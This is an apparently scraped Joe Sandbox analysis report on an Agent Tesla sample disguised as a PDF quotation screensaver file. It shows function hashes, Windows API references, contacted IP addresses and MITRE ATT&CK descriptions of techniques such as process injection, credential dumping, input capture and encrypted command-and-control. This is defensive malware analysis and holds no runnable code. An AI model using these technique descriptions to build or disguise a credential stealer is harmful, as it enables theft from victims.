Instruction ID: 6813f38093c59e52f3334e4c4797f92f3eab9d8a9d1d23931adaebd1cfa8ff2c
Opcode Fuzzy Hash: 6955ec1fee636de557b868f6fc2b0794f755d632e4c427c3060a9e63e5a90467
Instruction Fuzzy Hash: 7A21E3B59012489FDF10CFAAD984AEEBFF4FB48320F14841AE854A7310C374A945CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0A59EF50 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0A59EFD7

Memory Dump Source

Source File: 0000000B.00000002.572767287.000000000A590000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a590000_AppLaunch.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 3da35b42d46d33765551865bb20ba3df22e22737f4fb5e461ae49207c166c8f6
Instruction ID: 86752da6dc56af3c2bfb814f95b73fcccabc548189d3f41fbb03d23651e812ff
Opcode Fuzzy Hash: 3da35b42d46d33765551865bb20ba3df22e22737f4fb5e461ae49207c166c8f6
Instruction Fuzzy Hash: B821C2B59012089FDB10CFAAD984ADEBFF8FB48320F14841AE914A7310D378A954CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0A599082 Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0A59A016

Memory Dump Source

Source File: 0000000B.00000002.572767287.000000000A590000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a590000_AppLaunch.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 3970165d2f520a4e87752ba3a9687a1350aad770def403c9f0ea0c47afae5568
Instruction ID: 1399244cbbcd9805e5937ceb9a0c482040ab288fe165a2693576af111c6a56f6
Opcode Fuzzy Hash: 3970165d2f520a4e87752ba3a9687a1350aad770def403c9f0ea0c47afae5568
Instruction Fuzzy Hash: 821142B6C00608CFCB20CF9AC948ADEFBF4BB88220F15851ED829B7210D374A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0A599014 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0A59A016

Memory Dump Source

Source File: 0000000B.00000002.572767287.000000000A590000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a590000_AppLaunch.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: decbfc0c428536c11635790a17bb622d7c23297851f9dfd632d71a4a84ced1ff
Instruction ID: 5218904a2cd6202c647a8ac3f045d2f9e5a31017f84f19e6dd146fc3520e299e
Opcode Fuzzy Hash: decbfc0c428536c11635790a17bb622d7c23297851f9dfd632d71a4a84ced1ff
Instruction Fuzzy Hash: F911F0B6C00249CFDB20CF9AC944ADEFBF4FB89220F15841AD819AB210D375A549CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0A599FA8 Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0A59A016

Memory Dump Source

Source File: 0000000B.00000002.572767287.000000000A590000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a590000_AppLaunch.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: d22318f837a72d02673cd97eb96145dc9185f2b2ddc9fb9ba3293ff2d3561863
Instruction ID: 2abe9a6d4bea82a7e66d052f9aaca1600b2e2d2ae88d63a374f73a6f75302af1
Opcode Fuzzy Hash: d22318f837a72d02673cd97eb96145dc9185f2b2ddc9fb9ba3293ff2d3561863
Instruction Fuzzy Hash: 501123B5C003488FCB20CF9AD944ACEFBF4AF89320F15851AD829A7250C374A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FCF4E8 Relevance: 1.5, APIs: 1, Instructions: 44comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32 ref: 00FCF545

Memory Dump Source

Source File: 0000000B.00000002.572301979.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fc0000_AppLaunch.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 64a09273b81ed498681c114030324f84563da7856f84130e9c7b76a9c98c6b8c
Instruction ID: 49f17cbd12ece8f159771f59024a7faea889284f7980cb9854c9066dd45eee83
Opcode Fuzzy Hash: 64a09273b81ed498681c114030324f84563da7856f84130e9c7b76a9c98c6b8c
Instruction Fuzzy Hash: A011E8B5D002498FDB50CF9AD544BDEBFF4AB48324F24885AD518A7710C374A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00FCEBD8 Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,?,?,900A5315), ref: 00FCEC3F

Memory Dump Source

Source File: 0000000B.00000002.572301979.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fc0000_AppLaunch.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 91ad1a0b58e161b61e0b05ce18cc7dec14f3504d1b8c20ecef12089e3474e22a
Instruction ID: 1d1425075b678ec78a6cda41e82a8bc11c9c252868d19b8509935a33b18a7743
Opcode Fuzzy Hash: 91ad1a0b58e161b61e0b05ce18cc7dec14f3504d1b8c20ecef12089e3474e22a
Instruction Fuzzy Hash: C61106B5C002498FCB20CF9AD684BDEBFF4EB49324F24845AD518A7241C374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FCF4F0 Relevance: 1.5, APIs: 1, Instructions: 43comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32 ref: 00FCF545

Memory Dump Source

Source File: 0000000B.00000002.572301979.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fc0000_AppLaunch.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 5cec12d8b049d0c522607e97341e7b612f6dd1861b38b4fdbc68ceb87fc3ac02
Instruction ID: a0c2205f4ed46c3d96c47819fb29687c7d2cb903e4168cf4db16f75c6346f236
Opcode Fuzzy Hash: 5cec12d8b049d0c522607e97341e7b612f6dd1861b38b4fdbc68ceb87fc3ac02
Instruction Fuzzy Hash: 4511E5B5D002498FCB20DF9AD648BDEFFF8AB48324F24885AD518A7300C374A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00FCEBE0 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,?,?,900A5315), ref: 00FCEC3F

Memory Dump Source

Source File: 0000000B.00000002.572301979.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fc0000_AppLaunch.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 2b09941855ecb9343dd461c174b4f9f0a799420f16df95df257a51ab38617f75
Instruction ID: ea237c05f771f0a420216358eac1235499a9be1d0245e0f242b13386ee745aca
Opcode Fuzzy Hash: 2b09941855ecb9343dd461c174b4f9f0a799420f16df95df257a51ab38617f75
Instruction Fuzzy Hash: 7311E5B5C002498FCB20DF9AD684BDEFBF8EB49324F24845AD519A7350C774A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Source: Joe Sandbox View	IP Address: 162.159.129.233 162.159.129.233
Source: Joe Sandbox View	IP Address: 162.159.129.233 162.159.129.233
Source: Joe Sandbox View	IP Address: 162.159.134.233 162.159.134.233

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.log

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Windows Analysis Report
QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe

Function 05C0E108 Relevance: 3.1, Strings: 2, Instructions: 640
COMMON

Function 05C013A8 Relevance: 3.1, Strings: 2, Instructions: 558
COMMON

Function 05C07F70 Relevance: 4.3, Strings: 3, Instructions: 561
COMMON

Function 05C03878 Relevance: 4.2, Strings: 3, Instructions: 480
COMMON

Function 05C05528 Relevance: 4.1, Strings: 3, Instructions: 370
COMMON

Function 05C00040 Relevance: 3.0, Strings: 2, Instructions: 516
COMMON

Function 059A0078 Relevance: 2.9, Strings: 2, Instructions: 365
COMMON

Function 05C02F28 Relevance: 2.8, Strings: 2, Instructions: 348
COMMON

Function 05C01C28 Relevance: 2.7, Strings: 2, Instructions: 180
COMMON

Function 059A06E8 Relevance: 2.6, Strings: 2, Instructions: 147
COMMON

Function 05C0BD08 Relevance: 2.6, Strings: 2, Instructions: 146
COMMON

Function 059A0520 Relevance: 2.6, Strings: 2, Instructions: 135
COMMON

Function 05C06400 Relevance: 1.9, Strings: 1, Instructions: 677
COMMON

Function 05C00C20 Relevance: 1.8, Strings: 1, Instructions: 534
COMMON

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre